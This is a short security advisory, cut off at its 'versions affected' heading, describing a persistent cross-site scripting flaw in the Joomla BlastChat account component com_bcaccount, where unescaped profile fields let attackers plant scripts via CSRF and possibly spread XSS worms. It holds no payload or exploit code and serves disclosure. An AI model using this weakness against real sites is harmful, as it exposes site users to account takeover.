Joomla! Component com_bcaccount Persistent Cross Script Scripting (XSS) Vulnerability
1. OVERVIEW The Joomla! Component com_bcaccount was vulnerable to Persistent Cross Script Scripting (XSS) Vulnerability. 2. PRODUCT DESCRIPTION The Joomla! Component com_bcaccount is a chat user account management component of widely-used Blastchat chat client component (com_blastchatc) designed for website communities from the smallest personal websites to the huge megasites who desire to provide their members and visitors with a superb chat experience. BlastChat has currently been serving chat to over 50.000+ websites. 3. VULNERABILITY DESCRIPTION The Joomla! Component com_bcaccount does not properly escape user profile information when it is saved. Attackers can craft CSRF payloads to save persistent XSS in users' profiles, which can turn into massive XSS worms cloning. For more information about this kind of vulnerability, see OWASP Top 10 - A2, WASC-8 and CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'). 4. VERSIONS AFFECTED